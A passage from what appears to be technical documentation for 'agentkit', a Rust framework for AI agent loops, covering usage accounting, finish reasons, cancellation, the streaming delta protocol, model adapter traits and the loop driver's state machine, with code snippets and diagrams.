    pub currency: String, // ISO 4217, e.g. "USD"
    pub provider_amount: Option<String>,
}
}

Not all providers report all fields. TokenUsage uses Option for fields that only some providers support (reasoning tokens, cached input tokens, cache write tokens). The Usage struct itself wraps both token and cost in Option because some providers report one without the other.
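
A host that tracks session-wide usage has to decide how the optional fields combine. One plausible policy, sketched here with a trimmed field set (the accumulator itself is hypothetical, not part of the library): an Option field stays None until some turn actually reports it:

```rust
#[derive(Default, Debug, PartialEq)]
pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
    pub reasoning_tokens: Option<u64>,
}

// Hypothetical per-session accumulator: required counters always add;
// an optional counter only materialises once a turn reports it.
pub fn accumulate(total: &mut TokenUsage, turn: &TokenUsage) {
    total.input_tokens += turn.input_tokens;
    total.output_tokens += turn.output_tokens;
    if let Some(r) = turn.reasoning_tokens {
        *total.reasoning_tokens.get_or_insert(0) += r;
    }
}
```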

Finish reasons are normalized to a small, stable enum:

#![allow(unused)]
fn main() {
pub enum FinishReason {
    Completed,   // Normal completion
    ToolCall,    // Stopped to invoke tools
    MaxTokens,   // Hit the token limit
    Cancelled,   // User-initiated cancellation
    Blocked,     // Content policy violation
    Error,       // Generation error
    Other(String),
}
}

The loop inspects FinishReason to decide what to do next:

FinishReason   Loop behaviour
Completed      Return TurnResult to the host
ToolCall       Execute tools, start another model turn
MaxTokens      Return TurnResult (host may submit more input)
Cancelled      Return TurnResult with cancellation metadata
Blocked        Return TurnResult (host may adjust the prompt)
Error          Return error to the host
Other(s)       Treat as Completed (log the unknown reason)

Providers map their native stop reasons into this enum. The original value can be preserved in metadata if needed.
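
For an OpenAI-compatible provider, that mapping is a small match over the documented finish_reason strings ("stop", "tool_calls", "length", "content_filter"). A sketch, with unknown values falling through to Other as described above:

```rust
#[derive(Debug, PartialEq)]
pub enum FinishReason {
    Completed,
    ToolCall,
    MaxTokens,
    Cancelled,
    Blocked,
    Error,
    Other(String),
}

// Native OpenAI finish_reason strings projected into the normalized enum.
pub fn map_finish_reason(native: &str) -> FinishReason {
    match native {
        "stop" => FinishReason::Completed,
        "tool_calls" => FinishReason::ToolCall,
        "length" => FinishReason::MaxTokens,
        "content_filter" => FinishReason::Blocked,
        other => FinishReason::Other(other.to_string()),
    }
}
```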

Cancellation primitives

agentkit supports cooperative turn cancellation through a generation-counter pattern:

#![allow(unused)]
fn main() {
pub struct CancellationController { /* Arc<AtomicU64> */ }
pub struct CancellationHandle { /* Arc<AtomicU64> */ }
pub struct TurnCancellation { handle: CancellationHandle, generation: u64 }
}

The three types form a publish-subscribe pattern:

CancellationController              CancellationHandle
(owned by the host)                 (shared with loop + tools)
        │                                   │
        │  interrupt()                      │  checkpoint()
        │  ─────────▶ bumps AtomicU64       │  ────────────▶ TurnCancellation
        │             (generation: 0→1)     │                 { generation: 0 }
        │                                   │
        │                                   │  After interrupt():
        │                                   │  checkpoint.is_cancelled() → true
        │                                   │  (because 0 ≠ 1)

The controller increments a counter. Any TurnCancellation checkpoint created before the increment reports itself as cancelled. This is lightweight (one AtomicU64), lock-free, and works in tokio::select! to race a model call against user interruption:

#![allow(unused)]
fn main() {
tokio::select! {
    result = model_turn.next_event(None) => { /* process event */ }
    _ = cancellation.cancelled() => { /* turn was cancelled */ }
}
}

The cancelled() method polls every 10ms — fast enough for responsive cancellation, cheap enough to run alongside every model call.
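
The pattern is small enough to sketch in full. This illustrative version collapses the controller/handle split into a single type; the real crate separates them so the handle can be shared with the loop and tools independently:

```rust
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::Arc;

// Illustrative sketch of the generation-counter pattern; names mirror
// the agentkit types but the bodies are not the real implementation.
pub struct CancellationController(Arc<AtomicU64>);

pub struct TurnCancellation {
    counter: Arc<AtomicU64>,
    generation: u64,
}

impl CancellationController {
    pub fn new() -> Self {
        CancellationController(Arc::new(AtomicU64::new(0)))
    }

    /// Bump the generation: every checkpoint taken before this call
    /// now reports itself as cancelled.
    pub fn interrupt(&self) {
        self.0.fetch_add(1, Ordering::SeqCst);
    }

    /// Take a checkpoint pinned to the current generation.
    pub fn checkpoint(&self) -> TurnCancellation {
        TurnCancellation {
            counter: Arc::clone(&self.0),
            generation: self.0.load(Ordering::SeqCst),
        }
    }
}

impl TurnCancellation {
    /// Cancelled iff the counter moved past this checkpoint's generation.
    pub fn is_cancelled(&self) -> bool {
        self.counter.load(Ordering::SeqCst) != self.generation
    }
}
```

A checkpoint taken after interrupt() observes the new generation, so only in-flight turns see the cancellation.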

The ItemView trait

For downstream crates that need to operate on item-like types without depending on the concrete Item struct, agentkit defines a read-only view trait:

#![allow(unused)]
fn main() {
pub trait ItemView {
    fn kind(&self) -> ItemKind;
    fn parts(&self) -> &[Part];
    fn metadata(&self) -> &MetadataMap;
}
}

Item implements ItemView. Compaction strategies and reporters can accept &dyn ItemView if they need to work with projected or wrapped item types.

Design principles

Three principles guide the core data model:

  1. Normalize what the rest of the stack must reason about. If the loop, tools, compaction, and reporting all need to understand something, it gets a first-class type in core. This is why FinishReason has explicit variants for ToolCall and Cancelled rather than encoding them as metadata — the loop’s branching logic depends on them.

  2. Don’t force provider wire formats into the public API. Providers keep their native types internally. They project into core types at the boundary. A provider that uses "stop" for Completed and "end_turn" for ToolCall handles the mapping in its adapter — the loop never sees provider-native strings.

  3. Preserve provider-specific data without polluting the model. A small number of first-class fields (parts, usage, finish reason) plus an open-ended MetadataMap on every type. The first-class fields cover what the framework must understand; metadata covers what specific integrations care about.

Error types

agentkit-core defines three error types used across the workspace:

  • NormalizeError — content cannot be projected into the agentkit data model (e.g. an unsupported media type)
  • ProtocolError — the provider or loop reached an invalid state (e.g. a tool result without a matching call)
  • AgentError — unifies both via From impls, used as the top-level error type

These are intentionally minimal. Each downstream crate defines its own error types (like LoopError, ToolError, CompactionError) that wrap or convert from these when needed.

Crate: agentkit-core — this entire chapter describes types defined in this single crate. It has no runtime dependencies and no async code. Every other crate in the workspace depends on it.

Streaming and deltas

Models generate tokens incrementally. A production agent must handle this streaming output — rendering text to the user as it arrives, accumulating tool call arguments chunk by chunk, and folding everything into durable transcript items when the turn completes.

This chapter covers the Delta type and the streaming protocol.

The problem with streaming

Streaming creates a fundamental tension: the transcript stores complete Part values, but the model emits fragments. You need a way to bridge these two representations without requiring every downstream consumer (reporters, compaction, persistence) to understand the streaming protocol.

What the provider sends (SSE stream):

  data: {"delta":{"content":"The"}}
  data: {"delta":{"content":" answer"}}
  data: {"delta":{"content":" is"}}
  data: {"delta":{"content":" 42."}}
  data: [DONE]

What the transcript stores (after the turn):

  Item {
      kind: Assistant,
      parts: [Part::Text(TextPart { text: "The answer is 42." })]
  }

Everything between those two representations is the streaming layer’s job.

agentkit’s solution is to separate the two concerns entirely:

  • Delta — transient, incremental, consumed during a turn
  • Part — durable, complete, stored in the transcript after a turn

The loop folds deltas into parts. Reporters observe deltas for real-time rendering. The transcript only ever contains committed parts.

Provider SSE stream
        │
        ▼
   ┌──────────┐
   │ Adapter  │  converts SSE chunks → Delta values
   └────┬─────┘
        │
        ▼
   Delta stream (transient, intra-turn)
   ┌──────────────────────────────────────────────┐
   │ BeginPart → AppendText → AppendText → Commit │
   └─────┬──────────────┬────────────────────┬────┘
         │              │                    │
         ▼              ▼                    ▼
    LoopObserver    LoopObserver        LoopDriver
    (reporter)     (usage tracker)     (folds → Part)
                                             │
                                             ▼
                                     Transcript (durable)
                                     Vec<Item> with committed Parts

The delta protocol

#![allow(unused)]
fn main() {
pub enum Delta {
    BeginPart { part_id: PartId, kind: PartKind },
    AppendText { part_id: PartId, chunk: String },
    AppendBytes { part_id: PartId, chunk: Vec<u8> },
    ReplaceStructured { part_id: PartId, value: Value },
    SetMetadata { part_id: PartId, metadata: MetadataMap },
    CommitPart { part: Part },
}
}

Each variant serves a specific role in the streaming lifecycle:

Delta variant       When it’s emitted                                 What the consumer does

BeginPart           Model starts generating a new content block       Allocate a buffer for part_id
AppendText          A text chunk arrives (token or group of tokens)   Append to the text buffer
AppendBytes         A binary chunk arrives (audio, image data)        Append to the byte buffer
ReplaceStructured   A structured value is updated wholesale           Replace the buffer contents
SetMetadata         Metadata for a part is available                  Store metadata for the part
CommitPart          The part is complete                              Finalise, discard the buffer

A text streaming sequence

The most common case — the model generates a text response:

Adapter emits:                                       Reporter sees:     Buffer state:

1. BeginPart { id: "p1", kind: Text }                (allocate)         ""
2. AppendText { id: "p1", chunk: "The " }            print("The ")      "The "
3. AppendText { id: "p1", chunk: "answer" }          print("answer")    "The answer"
4. AppendText { id: "p1", chunk: " is " }            print(" is ")      "The answer is "
5. AppendText { id: "p1", chunk: "42." }             print("42.")       "The answer is 42."
6. CommitPart { part: Text("The answer is 42.") }    (done)             → transcript

The reporter prints each chunk as it arrives — the user sees text appear incrementally. The driver accumulates the same chunks but only commits the final Part to the transcript.
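
The driver-side fold can be sketched with a trimmed-down Delta enum. In the real protocol CommitPart carries the finished Part; here commit is keyed by part id for brevity:

```rust
use std::collections::HashMap;

// Trimmed-down stand-in for the real Delta enum: text streaming only.
pub enum Delta {
    BeginPart { part_id: String },
    AppendText { part_id: String, chunk: String },
    CommitPart { part_id: String },
}

/// Fold a delta stream into committed text parts, in commit order.
/// Buffers for uncommitted parts are simply discarded at the end.
pub fn fold_text(deltas: Vec<Delta>) -> Vec<String> {
    let mut buffers: HashMap<String, String> = HashMap::new();
    let mut committed = Vec::new();
    for delta in deltas {
        match delta {
            Delta::BeginPart { part_id } => {
                buffers.insert(part_id, String::new());
            }
            Delta::AppendText { part_id, chunk } => {
                buffers.entry(part_id).or_default().push_str(&chunk);
            }
            Delta::CommitPart { part_id } => {
                if let Some(text) = buffers.remove(&part_id) {
                    committed.push(text); // buffer dropped after commit
                }
            }
        }
    }
    committed
}
```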

A multi-part streaming sequence

An assistant response with both text and a tool call:

1. BeginPart { id: "p1", kind: Text }
2. AppendText { id: "p1", chunk: "I'll read that file." }
3. CommitPart { part: Text("I'll read that file.") }
4. BeginPart { id: "p2", kind: ToolCall }
5. AppendText { id: "p2", chunk: "{\"path\":" }          ← JSON argument streaming
6. AppendText { id: "p2", chunk: " \"src/main.rs\"}" }
7. CommitPart { part: ToolCall { name: "fs.read_file", input: {...} } }

Note that part_id distinguishes concurrent parts. The protocol supports interleaved deltas for different parts, though most providers emit parts sequentially.

Why not mirror Part variants in Delta?

A simpler design would be one delta variant per part type (TextDelta, MediaDelta, etc.). agentkit uses generic operations instead (AppendText, AppendBytes, ReplaceStructured) because:

  • Multiple part types use text appending (text, reasoning, tool call arguments)
  • Multiple part types use byte appending (audio, image, video)
  • The operations describe what’s happening during streaming, not what the final type will be
  • Adding a new part type doesn’t require a new delta variant unless it has genuinely novel streaming behavior

Delta operations vs Part types — the many-to-many relationship:

AppendText ────── Text          (user/assistant text)
           ├──── Reasoning      (chain-of-thought output)
           └──── ToolCall       (JSON arguments as text)

AppendBytes ───── Media(Audio)  (audio stream)
            ├──── Media(Image)  (image data)
            └──── Media(Video)  (video frames)

ReplaceStructured ─── Structured (JSON output, replaced wholesale)

Tool call streaming

Tool calls stream differently from text. The model emits the tool name upfront (usually in a non-streaming fashion) and then streams the JSON arguments incrementally:

SSE from provider:

  data: {"delta":{"tool_calls":[{"index":0,"id":"call-7","function":{"name":"fs.read_file"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"{\"pa"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"th\":"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":" \"sr"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"c/mai"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"n.rs\""}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"}"}}]}}

What the adapter emits:

  BeginPart { id: "tc0", kind: ToolCall }
  AppendText { id: "tc0", chunk: "{\"pa" }
  AppendText { id: "tc0", chunk: "th\":" }
  AppendText { id: "tc0", chunk: " \"sr" }
  AppendText { id: "tc0", chunk: "c/mai" }
  AppendText { id: "tc0", chunk: "n.rs\"" }
  AppendText { id: "tc0", chunk: "}" }
  CommitPart { part: ToolCall { id: "call-7", name: "fs.read_file", input: {"path":"src/main.rs"} } }

The loop waits for CommitPart before executing the tool. Partial JSON arguments are not actionable — {"pa is not a valid tool input. This is why tool calls use the same AppendText mechanism as regular text, but the driver only acts on the committed ToolCallPart.

Parallel tool call streaming

When the model requests multiple tool calls in a single response, the SSE stream interleaves them by index:

data: {"delta":{"tool_calls":[{"index":0,"id":"call-1","function":{"name":"fs.read_file"}}]}}
data: {"delta":{"tool_calls":[{"index":1,"id":"call-2","function":{"name":"shell.exec"}}]}}
data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"{\"path\":"}}]}}
data: {"delta":{"tool_calls":[{"index":1,"function":{"arguments":"{\"exec"}}]}}
...

The adapter maintains per-index accumulators and emits separate BeginPart/AppendText/CommitPart sequences for each tool call. The part_id field keeps them distinct.
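
A sketch of such a per-index accumulator, with illustrative names; a real adapter also tracks call IDs and emits BeginPart/AppendText deltas as chunks arrive rather than draining everything at the end:

```rust
use std::collections::BTreeMap;

// Illustrative per-index accumulation for interleaved SSE tool call
// chunks: names arrive once, argument fragments append.
#[derive(Default)]
pub struct ToolCallAccumulator {
    calls: BTreeMap<u32, (String, String)>, // index -> (name, argument buffer)
}

impl ToolCallAccumulator {
    pub fn set_name(&mut self, index: u32, name: &str) {
        self.calls.entry(index).or_default().0 = name.to_string();
    }

    pub fn append_arguments(&mut self, index: u32, fragment: &str) {
        self.calls.entry(index).or_default().1.push_str(fragment);
    }

    /// Drain completed (name, arguments) pairs in index order.
    pub fn finish(self) -> Vec<(String, String)> {
        self.calls.into_values().collect()
    }
}
```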

Reasoning block streaming

Models that expose chain-of-thought (like Claude with extended thinking) stream reasoning blocks before the final answer:

1. BeginPart { id: "r1", kind: Reasoning }
2. AppendText { id: "r1", chunk: "The user wants to know..." }
3. AppendText { id: "r1", chunk: " I should consider..." }
4. CommitPart { part: Reasoning { summary: Some("The user wants..."), ... } }
5. BeginPart { id: "p1", kind: Text }
6. AppendText { id: "p1", chunk: "The answer is 42." }
7. CommitPart { part: Text("The answer is 42.") }

A reporter can display reasoning blocks differently (dimmed, collapsible, in a side panel), while the transcript stores them as ordinary parts that compaction can later drop to save space.

Observer consumption

Reporters observe deltas via the LoopObserver trait:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}
}

When the driver receives a Delta from the model turn, it wraps it as AgentEvent::ContentDelta(delta) and dispatches it to all registered observers synchronously, in registration order.

This is how real-time text rendering works — the StdoutReporter receives AppendText deltas and writes each chunk to the terminal immediately:

#![allow(unused)]
fn main() {
fn handle_event(&mut self, event: AgentEvent) {
    if let AgentEvent::ContentDelta(Delta::AppendText { chunk, .. }) = &event {
        print!("{}", chunk);
        std::io::stdout().flush().ok();
    }
}
}

The ordering guarantee matters: within a single driver instance, deltas are delivered to observers in the order the adapter produces them. If the adapter emits AppendText("Hello") before AppendText(", world"), every observer sees them in that order. This is trivially satisfied because observers are called synchronously on the driver’s task — there is no async fan-out or buffering between the adapter and observers.

What observers should and shouldn’t do

Observers are called inline on the driver’s task. They must be fast — a slow observer blocks the entire loop. Guidelines:

  • Do: write to stderr/stdout, increment counters, append to a Vec
  • Do: send to a channel for async processing elsewhere
  • Don’t: make HTTP requests, write to databases, or do anything that might block
  • Don’t: modify the transcript or influence the loop’s control flow

If you need expensive processing, use a ChannelReporter adapter that forwards events to another task.
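
The forwarding pattern itself is just a cheap synchronous send. A sketch using a std::sync::mpsc channel, with AgentEvent reduced to a String stand-in:

```rust
use std::sync::mpsc;

// Stand-in for the real AgentEvent enum, to keep the sketch self-contained.
pub type AgentEvent = String;

// Illustrative channel-forwarding reporter: the observer side only
// enqueues; a worker thread elsewhere does the expensive processing.
pub struct ChannelReporter {
    tx: mpsc::Sender<AgentEvent>,
}

impl ChannelReporter {
    pub fn new() -> (Self, mpsc::Receiver<AgentEvent>) {
        let (tx, rx) = mpsc::channel();
        (ChannelReporter { tx }, rx)
    }

    /// Called inline on the driver's task: just enqueue and return.
    pub fn handle_event(&mut self, event: AgentEvent) {
        let _ = self.tx.send(event); // ignore error if the worker is gone
    }
}
```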

Relationship to the transcript

After a turn completes, the transcript contains only committed Part values inside Items. Deltas are discarded. On the next turn, the model receives the transcript — not the deltas that produced it.

During a turn:                        After a turn:

  Delta stream (live)                  Transcript (durable)
  ┌────────────────────┐               ┌─────────────────────────┐
  │ BeginPart          │               │ Item { kind: Assistant, │
  │ AppendText("He")   │               │   parts: [              │
  │ AppendText("llo")  │    fold ──▶   │     Text("Hello"),      │
  │ CommitPart(Text)   │               │     ToolCall { ... },   │
  │ BeginPart          │               │   ]                     │
  │ AppendText("{...") │               │ }                       │
  │ CommitPart(Tool)   │               └─────────────────────────┘
  └────────────────────┘
       (discarded)                          (persisted)

This separation means:

  • Compaction operates on stable, complete items — it never sees partial deltas
  • Persistence stores items, not delta streams — simpler storage format
  • The streaming protocol can evolve independently of the transcript format — adding a new delta variant doesn’t change how transcripts are stored
  • Replay is possible without streaming — a transcript can be loaded from storage and fed directly to the model without reconstructing the delta sequence

Crate: Delta, PartId, and PartKind are defined in agentkit-core. The folding logic lives in agentkit-loop. Reporters that consume deltas are in agentkit-reporting.

The model adapter boundary

Chapter 1 showed how to build adapters from the outside in — implementing them for specific providers. This chapter looks from the inside out: how the loop consumes the adapter traits, what guarantees it relies on, and what happens when those guarantees are violated.

The adapter boundary is the narrowest point in the architecture. Everything above it (loop logic, tool execution, compaction) is provider-agnostic. Everything below it (HTTP clients, SSE parsing, auth headers) is provider-specific. The three traits define the contract between these two worlds.

Three-level trait hierarchy

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ModelAdapter: Send + Sync {
    type Session: ModelSession;
    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError>;
}

#[async_trait]
pub trait ModelSession: Send {
    type Turn: ModelTurn;
    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Self::Turn, LoopError>;
}

#[async_trait]
pub trait ModelTurn: Send {
    async fn next_event(
        &mut self,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError>;
}
}

The Send + Sync bound on ModelAdapter means adapters can be shared across threads — an Agent can be cloned or wrapped in an Arc and used from multiple tasks. ModelSession is only Send, not Sync — sessions are single-owner and move between tasks but are not accessed concurrently. ModelTurn is likewise Send only.

Why three levels?

The decomposition maps to three distinct lifetimes in a provider interaction:

Lifetime      Trait          State it holds

Application   ModelAdapter   API key, base URL, HTTP client, model name (immutable, shared)
Session       ModelSession   Conversation ID, WebSocket connection, session token (mutable)
Turn          ModelTurn      SSE stream, response buffer, chunk parser (mutable, consumed once)

This supports both stateless and stateful providers:

  • Stateless HTTP providers (OpenAI, OpenRouter, Groq): start_session creates a lightweight handle holding a copy of the config. begin_turn sends the full transcript as an HTTP POST. next_event reads SSE chunks from the response.

  • Stateful session providers (WebSocket-based, real-time APIs): start_session opens a persistent connection. begin_turn sends a delta or continuation message (not the full transcript). next_event reads frames from the live connection. Session cleanup happens on drop.

The loop doesn’t care which pattern the adapter uses. It calls the same trait methods either way.

Stateless adapter (HTTP):

  Adapter ──start_session──▶ Session (just holds config)
                                │
                                ├──begin_turn──▶ POST /v1/chat/completions
                                │                      │
                                │                Turn ◀┘ (SSE stream handle)
                                │                  │
                                │                  ├── next_event() → Delta
                                │                  ├── next_event() → Delta
                                │                  ├── next_event() → Finished
                                │                  └── next_event() → None
                                │
                                ├──begin_turn──▶ POST /v1/chat/completions
                                │
                                ...


Stateful adapter (WebSocket):

  Adapter ──start_session──▶ Session (owns WebSocket connection)
                                │
                                ├──begin_turn──▶ send continuation frame
                                │                      │
                                │                Turn ◀┘ (reads from same socket)
                                │                  │
                                │                  ├── next_event() → Delta
                                │                  └── next_event() → Finished
                                │
                                ├──begin_turn──▶ send next frame
                                ...

ModelTurnEvent

The model turn emits a stream of normalized events:

#![allow(unused)]
fn main() {
pub enum ModelTurnEvent {
    Delta(Delta),
    ToolCall(ToolCallPart),
    Usage(Usage),
    Finished(ModelTurnResult),
}
}

The adapter is responsible for converting provider-native wire formats into these normalized events. This is where the translation happens — the loop never sees provider-specific response shapes.

The events have a natural ordering within a turn:

Turn event timeline:

  ──────────────────────────────────────────────────────────▶ time

  Delta(BeginPart)
  Delta(AppendText)  ─┐
  Delta(AppendText)   │  streaming text
  Delta(AppendText)  ─┘
  Delta(CommitPart)

  ToolCall(ToolCallPart)    ← fully assembled tool call
  ToolCall(ToolCallPart)    ← another tool call (if parallel)

  Usage(Usage)              ← token counts

  Finished(ModelTurnResult) ← always last

Finished always comes last. Usage typically comes just before Finished, but some providers interleave it with deltas. ToolCall events represent fully assembled tool calls — the adapter has already accumulated the streaming chunks internally.

ModelTurnResult

#![allow(unused)]
fn main() {
pub struct ModelTurnResult {
    pub finish_reason: FinishReason,
    pub output_items: Vec<Item>,
    pub usage: Option<Usage>,
    pub metadata: MetadataMap,
}
}

The output_items field carries the complete assistant response as transcript items. The loop appends these directly to the transcript. finish_reason tells the loop what to do next — execute tool calls, return to the host, or handle an error.

TurnRequest

The loop constructs a TurnRequest containing everything the adapter needs:

#![allow(unused)]
fn main() {
pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

The loop owns TurnRequest construction. The host doesn’t rebuild model-facing state manually each turn. The transcript field contains the full conversation so far — system prompt, context items, user messages, assistant responses, tool results. For stateless providers, this is sent in every request. For stateful providers, the adapter decides what subset to send.

available_tools contains the tool specifications from the registry. The adapter converts these into the provider’s tool schema format (typically { "type": "function", "function": { ... } }).

metadata is a pass-through for per-turn options. The host can set provider-specific parameters here without the loop needing to understand them.

cache is the normalized prompt caching request for the turn. The adapter maps it into provider-native controls or explicit cache headers. That mapping is covered in Chapter 15.

Cancellation threading

Both begin_turn and next_event accept an Option<TurnCancellation>. The loop creates a checkpoint at the start of each turn and passes it through:

Host calls controller.interrupt()
         │
         ▼
  CancellationController bumps generation (0 → 1)
         │
         ├──▶ TurnCancellation in begin_turn()
         │    checkpoint.is_cancelled() → true
         │    adapter can abort the HTTP request
         │
         └──▶ TurnCancellation in next_event()
              checkpoint.is_cancelled() → true
              adapter can stop reading the SSE stream

The adapter should check cancellation at natural yield points — before sending an HTTP request, between SSE chunks, or in a tokio::select! race. When cancelled, return Err(LoopError::Cancelled) and the loop handles the rest.

The normalization contract

The adapter has one critical responsibility: produce correct normalized types. The loop’s behaviour depends on these guarantees:

Guarantee                                                  What happens if violated

Finished is emitted exactly once, as the last event        Loop hangs or processes stale events
FinishReason::ToolCall when tool calls are present         Loop ignores tool calls, returns text-only
ToolCallPart has a unique, non-empty id                    Tool results can’t be correlated; model sees wrong results
ToolCallPart.input is valid JSON                           Tool receives unparseable input, returns an error
Usage token counts are accurate                            Compaction triggers fire at wrong times; cost reporting is wrong
Delta sequences follow BeginPart → Append* → CommitPart    Reporter renders garbage; buffer state is inconsistent

These are not enforced at the type level — the adapter must get them right. This is the most important surface to test when implementing a new provider.

Testing the contract

Write tests that verify each guarantee in isolation:

  1. Send a simple text prompt → assert Delta sequence ends with CommitPart and Finished
  2. Send a prompt that triggers tool calls → assert ToolCall events have valid IDs and JSON input
  3. Send a prompt that hits the token limit → assert FinishReason::MaxTokens
  4. Cancel mid-stream → assert the adapter returns LoopError::Cancelled cleanly
  5. Verify Usage token counts are non-zero and plausible

Mock the HTTP layer or use a local test server. Don’t test against live provider APIs in CI — they’re slow, flaky, and cost money.
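
The first guarantee lends itself to a reusable predicate. A sketch with a stand-in event enum; a real test would run it over the events collected from a mocked stream:

```rust
// Stand-in for ModelTurnEvent, payloads omitted for brevity.
#[derive(PartialEq)]
pub enum Event {
    Delta,
    ToolCall,
    Usage,
    Finished,
}

/// Contract check: Finished must appear exactly once, as the last event.
pub fn finished_is_last_and_unique(events: &[Event]) -> bool {
    let count = events.iter().filter(|e| **e == Event::Finished).count();
    count == 1 && events.last() == Some(&Event::Finished)
}
```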

Runtime independence

agentkit-loop is runtime-agnostic — it depends on async traits, not on tokio directly. The model adapter traits use async_trait and require only Send, not any runtime-specific bounds.

In practice, most adapters use tokio for HTTP clients (reqwest) and SSE parsing. But the loop crate itself can run on any executor — tokio, async-std, or a custom runtime. This is a deliberate architectural choice: the core loop is portable, while runtime-specific concerns live in leaf crates (provider adapters, task managers).

The futures-timer crate is used for the cancellation polling delay instead of tokio::time, keeping the core free of runtime dependencies.

Example: openrouter-chat shows a minimal adapter in action — one model, one session, one turn, rendered to stdout.

Crate: The adapter traits are defined in agentkit-loop. Provider adapters live in agentkit-provider-* crates.

Driving the loop

This chapter walks through the LoopDriver — the runtime heart of the agent. We’ll trace a complete turn from input submission through model invocation, tool execution, and final result.

The driver API

The LoopDriver is generic over the model session type:

#![allow(unused)]
fn main() {
pub struct LoopDriver<S: ModelSession> {
    session_id: SessionId,
    session: Option<S>,
    tool_executor: Arc<BasicToolExecutor>,
    task_manager: Arc<dyn TaskManager>,
    permissions: Arc<dyn PermissionChecker>,
    resources: Arc<dyn ToolResources>,
    cancellation: Option<CancellationHandle>,
    compaction: Option<CompactionConfig>,
    observers: Vec<Box<dyn LoopObserver>>,
    transcript: Vec<Item>,
    pending_input: Vec<Item>,
    pending_approvals: BTreeMap<ToolCallId, PendingApprovalToolCall>,
    pending_auth: Option<PendingAuthToolCall>,
    active_tool_round: Option<ActiveToolRound>,
    next_turn_index: u64,
}
}

The public API is narrow:

#![allow(unused)]
fn main() {
impl<S: ModelSession> LoopDriver<S> {
    pub fn submit_input(&mut self, input: Vec<Item>) -> Result<(), LoopError>;
    pub fn resolve_approval_for(&mut self, call_id: ToolCallId, decision: ApprovalDecision)
        -> Result<(), LoopError>;
    pub fn resolve_auth(&mut self, resolution: AuthResolution) -> Result<(), LoopError>;
    pub async fn next(&mut self) -> Result<LoopStep, LoopError>;
    pub fn snapshot(&self) -> LoopSnapshot;
}
}

The host code is a simple loop:

#![allow(unused)]
fn main() {
driver.submit_input(vec![system_item, user_item])?;

loop {
    match driver.next().await? {
        LoopStep::Interrupt(interrupt) => handle_interrupt(interrupt),
        LoopStep::Finished(result) => break,
    }
}
}

State machine semantics

next() is the only async method. It advances the driver through its internal state machine until it hits a yield point — either a finished turn or an interrupt. There is no polling, no callback registration, and no event queue to drain.

Driver state machine:

                submit_input()
                      │
                      ▼
  ┌─────────────────────────────────┐
  │         Has pending input?      │
  │                                 │
  │  yes ──▶ merge into transcript  │
  │  no  ──▶ AwaitingInput         ─┼──▶ Interrupt
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │      Compaction trigger?        │
  │                                 │
  │  yes ──▶ run compaction pipeline│
  │  no  ──▶ skip                   │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │      Model turn                 │
  │                                 │
  │  stream events from model       │
  │  collect tool calls             │
  │  emit AgentEvents to observers  │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │      Tool calls present?        │
  │                                 │
  │  no  ──▶ Finished(TurnResult)  ─┼──▶ return
  │  yes ──▶ permission preflight   │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │    Any require approval?        │
  │                                 │
  │  yes ──▶ ApprovalRequest       ─┼──▶ Interrupt
  │  no  ──▶ execute tools          │
  └─────────────┬───────────────────┘
                │
                ▼
       append tool results
                │
                ▼
       go to "Model turn" ◀─── automatic tool roundtrip

The host cannot call next() twice without resolving an outstanding interrupt — that’s a state error. This is intentional. The driver forces the host to deal with interrupts before proceeding. You can’t accidentally ignore an approval request.

Anatomy of a turn

Here’s what happens inside next(), step by step:

1. Merge input

Pending items (submitted via submit_input()) are appended to the working transcript. The driver emits AgentEvent::InputAccepted to observers.

Before:
  transcript: [System, Context, User("hello"), Assistant("Hi!")]
  pending:    [User("Read main.rs")]

After merge:
  transcript: [System, Context, User("hello"), Assistant("Hi!"), User("Read main.rs")]
  pending:    []

2. Check compaction

If a CompactionConfig is set, the trigger evaluates the transcript. If it fires, the strategy pipeline transforms the transcript before the model sees it:

Before compaction (18 items, trigger threshold: 12):
  [System, Context, User, Asst, Tool, User, Asst, Tool, Tool, User, Asst, Tool, User, Asst, Tool, User, Asst, Tool]

After compaction (keep recent 6 + preserve System/Context):
  [System, Context, User, Asst, Tool, User, Asst, Tool]
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                    most recent 6 non-preserved items

Compaction happens before the model turn, not after. The model always sees the post-compaction transcript.
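
The keep-recent behaviour above can be written as a pure function over item kinds. This illustrative version moves preserved items to the front, which matches transcripts where System and Context lead; the real pipeline operates on full Items via strategy types:

```rust
// Stand-in for the real ItemKind enum.
#[derive(Clone, Debug, PartialEq)]
pub enum ItemKind {
    System,
    Context,
    User,
    Assistant,
    Tool,
}

/// Preserve System/Context items; keep only the most recent `keep`
/// of everything else.
pub fn compact_keep_recent(items: Vec<ItemKind>, keep: usize) -> Vec<ItemKind> {
    let preserved: Vec<ItemKind> = items
        .iter()
        .filter(|k| matches!(k, ItemKind::System | ItemKind::Context))
        .cloned()
        .collect();
    let rest: Vec<ItemKind> = items
        .into_iter()
        .filter(|k| !matches!(k, ItemKind::System | ItemKind::Context))
        .collect();
    let start = rest.len().saturating_sub(keep);
    preserved.into_iter().chain(rest[start..].iter().cloned()).collect()
}
```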

3. Construct TurnRequest

